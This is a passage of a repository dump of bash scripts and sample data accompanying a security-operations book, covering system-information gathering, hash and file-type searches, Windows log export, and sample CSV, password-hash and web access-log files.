Repository: cybersecurityops/cyber-ops-with-bash
Branch: master
Commit: 84ccf91092e1
Files: 71
Total size: 123.7 KB
Directory structure:
gitextract_c6os0si7/
├── LICENSE
├── ch03/
│ ├── echoparams.sh
│ └── osdetect.sh
├── ch04/
│ └── frost.txt
├── ch05/
│ ├── cmds.txt
│ ├── cutfile.txt
│ ├── getlocal.sh
│ ├── hashsearch.sh
│ ├── typesearch.sh
│ └── winlogs.sh
├── ch06/
│ ├── accesstime.txt
│ ├── awkusers.txt
│ ├── book.json
│ ├── book.xml
│ ├── csvex.txt
│ ├── ips.txt
│ ├── passwords.txt
│ ├── procowner.txt
│ ├── tasks.txt
│ ├── user.txt
│ └── usernames.txt
├── ch07/
│ ├── access.log
│ ├── countem.awk
│ ├── countem.sh
│ ├── histogram.sh
│ ├── histogram_plain.sh
│ ├── pagereq.awk
│ ├── pagereq.sh
│ ├── summer.sh
│ ├── useragents.sh
│ └── useragents.txt
├── ch08/
│ ├── livebar.sh
│ ├── looper.sh
│ ├── tailcount.sh
│ └── wintail.sh
├── ch09/
│ ├── autoscan.sh
│ ├── fd2.sh
│ └── scan.sh
├── ch10/
│ └── baseline.sh
├── ch11/
│ ├── Calc_VT.txt
│ ├── WannaCry_VT.txt
│ ├── helloworld.c
│ ├── vtjson.awk
│ └── vtjson.sh
├── ch12/
│ ├── tagit.sh
│ ├── webdash.sh
│ └── weblogfmt.sh
├── ch13/
│ ├── bannergrabber.sh
│ └── smtpconnect.sh
├── ch14/
│ ├── askey.sh
│ ├── innerscript.sh
│ ├── logfuscate.sh
│ ├── oneline.sh
│ ├── readable.sh
│ ├── streamcipher.sh
│ ├── synfuscate.sh
│ └── wrapper.sh
├── ch15/
│ ├── fuzzer.sh
│ └── fuzzme.c
├── ch16/
│ ├── LocalRat.sh
│ └── RemoteRat.sh
├── ch19/
│ └── pingmonitor.sh
├── ch20/
│ └── softinv.sh
├── ch21/
│ ├── test.input
│ └── validateconfig.sh
├── ch22/
│ ├── checkemail.1liner
│ ├── checkemail.sh
│ ├── checkemailAlt.sh
│ ├── checkpass.sh
│ └── emailbatch.sh
└── readme.txt
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2019 Cybersecurity Ops with bash
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: ch03/echoparams.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# echoparams.sh
#
# Description:
# Demonstrates accessing parameters in bash
#
# Usage:
# ./echoparams.sh <param 1> <param 2> <param 3>
#
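# Print the argument count, the script name, and the first three positional
# parameters, one per line.
#
# printf with a fixed '%s\n' format and quoted expansions is used so that a
# parameter such as "-n", "*" or "a  b" is printed exactly as it was passed,
# instead of being taken as an echo option, glob-expanded against the
# current directory, or having its whitespace collapsed.
printf '%s\n' "$#"
printf '%s\n' "$0"
printf '%s\n' "$1"
printf '%s\n' "$2"
printf '%s\n' "$3"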
================================================
FILE: ch03/osdetect.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# osdetect.sh
#
# Description:
# Distinguish between MS-Windows/Linux/MacOS
#
# Usage: bash osdetect.sh
# output will be one of: Linux MSWin macOS
#
# Decide the platform by probing for a command that only one of them ships.
# Linux is the fallback when neither probe succeeds.
#
# NOTE(review): "type -t" succeeds for anything the shell can resolve under
# that name (file on PATH, function, alias, builtin), so the answer is only
# as trustworthy as the PATH and shell environment the script runs with.
OS=Linux
if type -t wevtutil &> /dev/null        # Windows event-log utility
then
    OS=MSWin
elif type -t scutil &> /dev/null        # macOS system-configuration utility
then
    OS=macOS
fi
echo "$OS"
================================================
FILE: ch04/frost.txt
================================================
1 Two roads diverged in a yellow wood,
2 And sorry I could not travel both
3 And be one traveler, long I stood
4 And looked down one as far as I could
5 To where it bent in the undergrowth;
6
7 Excerpt from The Road Not Taken by Robert Frost
================================================
FILE: ch05/cmds.txt
================================================
#Linux Command |MSWin Bash |XML tag |Purpose
#----------------+------------+-----------+------------------------------
uname -a |uname -a |uname |O.S. version etc
cat /proc/cpuinfo|systeminfo |sysinfo |system hardware and related info
ifconfig |ipconfig |nwinterface|Network interface information
ip route |route print |nwroute |routing table
arp -a |arp -a |nwarp |ARP table
netstat -a |netstat -a |netstat |network connections
mount |net share |diskinfo |mounted disks
ps -e |tasklist |processes |running processes
================================================
FILE: ch05/cutfile.txt
================================================
12/05/2017 192.168.10.14 test.html
12/30/2017 192.168.10.185 login.html
================================================
FILE: ch05/getlocal.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# getlocal.sh
#
# Description:
# Gathers general system information and dumps it to a file
#
# Usage:
# bash getlocal.sh < cmds.txt
# cmds.txt is a file with list of commands to run
#
# SepCmds - split one '|'-separated input line into its fields
#
# Globals read:    ALINE  - the line to split
#                  OSTYPE - "MSWin" selects the Windows command
# Globals written: LCMD (field 1), WCMD (field 2), TAG (field 3),
#                  REST (scratch: what is left after field 2),
#                  CMD  (WCMD on MSWin, LCMD otherwise)
# Field padding is kept as-is; nothing is trimmed here.
function SepCmds()
{
    # field 1: everything before the first '|'
    LCMD=${ALINE%%|*}

    # field 2: drop field 1, then cut at the next '|'
    REST=${ALINE#*|}
    WCMD=${REST%%|*}

    # field 3: drop field 2, then cut at the next '|'
    REST=${REST#*|}
    TAG=${REST%%|*}

    # choose the command that belongs to this platform
    case $OSTYPE in
        MSWin) CMD="$WCMD" ;;
        *)     CMD="$LCMD" ;;
    esac
}
# DumpInfo - run every command listed on stdin and wrap its output in tags
#
# Globals read:    HOSTNAME, OSTYPE; CMD and TAG after each SepCmds call
# Globals written: CMDS (all input lines), ALINE (line being processed)
# Input:           stdin, one '|'-separated command description per line
# Output:          a <systeminfo> element on stdout
#
# NOTE(review): every non-comment input line is executed as a command with
# the privileges of whoever runs the script, so the command list has to come
# from a trusted source that others cannot modify. Command output is written
# verbatim between the tags; nothing here escapes '<', '>' or '&'.
function DumpInfo ()
{
    printf '<systeminfo host="%s" type="%s"' "$HOSTNAME" "$OSTYPE"
    printf ' date="%s" time="%s">\n' "$(date '+%F')" "$(date '+%T')"

    # Slurp all of stdin; without -t each element keeps its newline.
    readarray CMDS

    for ALINE in "${CMDS[@]}"
    do
        # lines starting with '#' are comments
        [[ $ALINE == '#'* ]] && continue

        # split ALINE into its fields
        SepCmds

        # a command marked N/A does not exist on this platform
        [[ $CMD == N/A* ]] && continue

        # TAG and CMD are left unquoted on purpose: word splitting drops
        # the column padding from TAG and breaks CMD into the command
        # name plus its arguments.
        printf "<%s>\n" $TAG
        $CMD
        printf "</%s>\n" $TAG
    done

    printf "</systeminfo>\n"
}
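# Identify the platform with the companion osdetect.sh script.
# NOTE(review): the relative path is resolved against the current directory,
# so run this from the directory that holds osdetect.sh and make sure that
# directory is not writable by untrusted users.
OSTYPE=$(./osdetect.sh)
HOSTNM=$(hostname)
TMPFILE="${HOSTNM}.info"
# gather the info into the tmp file; errors, too
# (the target is quoted so an unusual host name cannot split or glob it)
DumpInfo > "$TMPFILE" 2>&1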
================================================
FILE: ch05/hashsearch.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# hashsearch.sh
#
# Description:
# Recursively search a given directory for a file that
# matches a given SHA-1 hash
#
# Usage:
# hashsearch.sh <hash> <directory>
# hash - SHA-1 hash value of the file to find
# directory - Top directory to start search
#
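# $1 - SHA-1 hash to look for. sha1sum prints lowercase hex, so the value is
#      folded to lowercase here and a hash pasted in uppercase still matches.
HASH=$(printf '%s' "$1" | tr 'A-F' 'a-f')
# $2 - top of the search; default is here, cwd
DIR=${2:-.}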
# mkabspath - turn a pathname into an absolute one
#
# Arguments:       $1 - pathname, absolute or relative
# Globals written: ABS - $1 unchanged when it already starts with '/',
#                        otherwise "$PWD/$1"
# The path is only prefixed, never normalised: "./x" becomes "$PWD/./x".
function mkabspath ()
{
    case $1 in
        /*) ABS=$1 ;;
        *)  ABS="$PWD/$1" ;;
    esac
}
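# Hash every regular file under DIR and print the absolute path of each file
# whose SHA-1 digest equals HASH.
#  - paths travel NUL-delimited and are read with IFS= / -r, so names that
#    hold spaces, backslashes or newlines reach sha1sum unchanged
#  - the file is fed to sha1sum on stdin, so the output line starts with the
#    digest and never contains the file name
#  - "$HASH" is quoted so it is compared as a literal string; unquoted, the
#    right-hand side of == is a glob pattern and a value such as '*' would
#    report every file as a match
find "$DIR" -type f -print0 |
while IFS= read -r -d '' fn
do
    THISONE=$(sha1sum < "$fn")
    THISONE=${THISONE%% *}          # keep the digest, drop the "  -" suffix
    if [[ $THISONE == "$HASH" ]]
    then
        mkabspath "$fn"             # sets ABS
        printf '%s\n' "$ABS"
    fi
done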
================================================
FILE: ch05/typesearch.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# typesearch.sh
#
# Description:
# Search the file system for a given file type. It prints out the
# pathname when found.
#
# Usage:
# typesearch.sh [-c dir] [-i] [-R|r] <pattern> <path>
# -c Copy files found to dir
# -i Ignore case
# -R|r Recursively search subdirectories
# <pattern> File type pattern to search for
# <path> Path to start search
#
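# Start every option variable from a known value so that nothing leaks in
# from the caller's environment (an exported COPY or CASEMATCH would
# otherwise change what the script does).
COPY=
DESTDIR=
CASEMATCH=()                    # extra grep options; empty = case-sensitive
DEEPORNOT=(-maxdepth 1)         # just the current dir; default

# PARSE option arguments:
while getopts 'c:irR' opt; do
    case "${opt}" in
        c)  # copy found files to specified directory
            COPY=YES
            DESTDIR="$OPTARG"
            ;;
        i)  # ignore u/l case differences in search
            CASEMATCH=(-i)
            ;;
        [Rr])  # recursive: drop the depth limit
            DEEPORNOT=()
            ;;
        *)  # unknown/unsupported option
            # error message will come from getopts, so just exit
            exit 2
            ;;
    esac
done
shift $((OPTIND - 1))           # leave only <pattern> and <path>

PATTERN=${1:-PDF document}      # regular expression matched against the type
STARTDIR=${2:-.}                # by default start here

# Paths travel NUL-delimited and are read with IFS= / -r so that names with
# spaces, backslashes or newlines are handled as a single path.
find "$STARTDIR" "${DEEPORNOT[@]}" -type f -print0 |
while IFS= read -r -d '' FN
do
    # file -b prints only the type description, so PATTERN is matched
    # against the detected type and not against the path name as well.
    # "--" keeps a name or pattern that starts with '-' from being read as
    # an option.
    if file -b -- "$FN" | grep -E -q "${CASEMATCH[@]}" -- "$PATTERN"
    then
        printf '%s\n' "$FN"
        if [[ $COPY ]]
        then
            # -p keeps mode and timestamps of the original
            cp -p -- "$FN" "$DESTDIR"
        fi
    fi
done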
================================================
FILE: ch05/winlogs.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# winlogs.sh
#
# Description:
# Gather copies of Windows log files
#
# Usage:
# winlogs.sh [-z] [dir]
# -z Tar and zip the output
# dir Optional scratch directory for holding the log files
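TGZ=0
if (( $# > 0 ))
then
    # only the first two characters are compared, so "-z" and "-zanything"
    # both switch archiving on
    if [[ ${1:0:2} == '-z' ]]
    then
        TGZ=1       # tgz flag to tar/zip the log files
        shift
    fi
fi

SYSNAM=$(hostname)

# NOTE(review): the default scratch directory has a predictable name under
# /tmp, and mkdir -p also accepts a directory that already exists. Exported
# event logs can hold sensitive data, so on a shared system pass a private
# directory as the argument instead of relying on the default.
LOGDIR=${1:-/tmp/${SYSNAM}_logs}
mkdir -p -- "$LOGDIR"
cd -- "$LOGDIR" || exit -2

# Export every event log that wevtutil enumerates into the scratch directory.
# read -r keeps backslashes in a log name intact.
wevtutil el | while read -r ALOG
do
    ALOG="${ALOG%$'\r'}"            # drop the CR of a Windows line ending
    printf '%s:\n' "$ALOG"          # progress: name of the log being copied
    SAFNAM="${ALOG// /_}"           # file-name-safe form: ' ' -> '_'
    SAFNAM="${SAFNAM//\//-}"        #                      '/' -> '-'
    wevtutil epl "$ALOG" "${SYSNAM}_${SAFNAM}.evtx"
done

if (( TGZ == 1 ))
then
    # "--" ends option parsing before the expanded file names
    tar -czvf "${SYSNAM}_logs.tgz" -- *.evtx
fi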
================================================
FILE: ch06/accesstime.txt
================================================
0745,file1.txt,1
0830,file4.txt,2
0830,file5.txt,3
================================================
FILE: ch06/awkusers.txt
================================================
Mike Jones
John Smith
Kathy Jones
Jane Kennedy
Tim Scott
================================================
FILE: ch06/book.json
================================================
{ <1>
"title": "Cybersecurity Ops with bash", <2>
"edition": 1,
"authors": [ <3>
{
"firstName": "Paul",
"lastName": "Troncone"
},
{
"firstName": "Carl",
"lastName": "Albing"
}
]
}
================================================
FILE: ch06/book.xml
================================================
<book title="Cybersecurity Ops with bash" edition="1"> <1>
<author> <2>
<firstName>Paul</firstName> <3>
<lastName>Troncone</lastName>
</author> <4>
<author>
<firstName>Carl</firstName>
<lastName>Albing</lastName>
</author>
</book>
================================================
FILE: ch06/csvex.txt
================================================
"name","username","phone","password hash"
"John Smith","jsmith","555-555-1212",5f4dcc3b5aa765d61d8327deb882cf99
"Jane Smith","jnsmith","555-555-1234",e10adc3949ba59abbe56e057f20f883e
"Bill Jones","bjones","555-555-6789",d8578edf8458ce06fbc5bb76a58c5ca4
================================================
FILE: ch06/ips.txt
================================================
ip,OS
10.0.4.2,Windows 8
10.0.4.35,Ubuntu 16
10.0.4.107,macOS
10.0.4.145,macOS
================================================
FILE: ch06/passwords.txt
================================================
password,md5hash
123456,e10adc3949ba59abbe56e057f20f883e
password,5f4dcc3b5aa765d61d8327deb882cf99
welcome,40be4e59b9a2a2b5dffb918c0e86b3d7
ninja,3899dcbab79f92af727c2190bbd8abc5
abc123,e99a18c428cb38d5f260853678922e03
123456789,25f9e794323b453885f5181f1b624d0b
12345678,25d55ad283aa400af464c76d713c07ad
sunshine,0571749e2ac330a7455809c6b0e7af90
princess,8afa847f50a716e64932d995c8e7435a
qwerty,d8578edf8458ce06fbc5bb76a58c5c
================================================
FILE: ch06/procowner.txt
================================================
Process Owner;PID
jdoe;0
tjones;4
jsmith;340
msmith;528
================================================
FILE: ch06/tasks.txt
================================================
Image Name;PID;Session Name;Session#;Mem Usage
System Idle Process;0;Services;0;4 K
System;4;Services;0;2,140 K
smss.exe;340;Services;0;1,060 K
csrss.exe;528;Services;0;4,756 K
================================================
FILE: ch06/user.txt
================================================
user,ip
jdoe,10.0.4.2
jsmith,10.0.4.35
msmith,10.0.4.107
tjones,10.0.4.145
================================================
FILE: ch06/usernames.txt
================================================
1,jdoe
2,puser
3,jsmith
================================================
FILE: ch07/access.log
================================================
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /fade.gif HTTP/1.1" 200 1112 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /favicon.ico HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /index.html HTTP/1.1" 200 6933 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /favicon.ico HTTP/1.1" 404 504 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47030 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /about.html HTTP/1.1" 200 7042 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1" 200 265418 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1" 200 120188 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:54:11 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /favicon.ico HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /index.html HTTP/1.1" 200 6932 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19525 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42819 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] "GET /support.html HTTP/1.1" 200 6207 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:31 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /request-quote.html HTTP/1.1" 200 7326 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1" 200 1386 "http://192.168.0.35/files/main_styleaf0e.css?1509483497" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /products.html HTTP/1.1" 200 7158 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26428 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38062 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
